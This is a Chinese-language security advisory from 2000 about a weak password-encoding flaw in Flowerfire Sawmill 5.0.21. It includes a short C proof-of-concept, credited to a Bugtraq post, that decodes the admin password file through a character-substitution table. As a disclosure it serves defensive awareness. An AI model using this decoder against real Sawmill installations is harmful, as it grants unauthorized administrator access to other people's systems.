Flowerfire Sawmill弱密码漏洞发布时间:2000-09-15 更新时间:2000-09-15 严重程度:中 威胁程度:口令恢复 错误类型:设计错误 利用方式:服务器模式 受影响系统 Flowerfire Sawmill 5.0.21详细描述 Sawmill是一个站点统计的软件包,windows\unix\mac都可以使用,但是它的加密便用了不安全的哈希函数,攻击者可能读取它的password文件,并将其解密以获得Sawmill的管理员权限。 测试代码 下面的代码由Larry Cashdollar <lwc@vapid.dhs.org> 在bugtraq上发布 /*Decrypt password for Sawmill admin account. Larry W. Cashdollar lwc@vapid.betteros.org http://vapid.betteros.org usage ./decrypt cyphertext */ #include <stdio.h> char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|" char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z" int main (int argc, char **argv) { int x, y; char cypher[128]; strncpy (cypher, argv[1], 128); for (x = 0; x < strlen (cypher); x++) { for (y = 0; y < strlen (encode); y++) if (cypher[x] == encode[y]) printf ("%c", alpha[y]); } printf("\n\"+\" could also be a space [ ]\n"); } 解决方案 尚无 相关信息 |
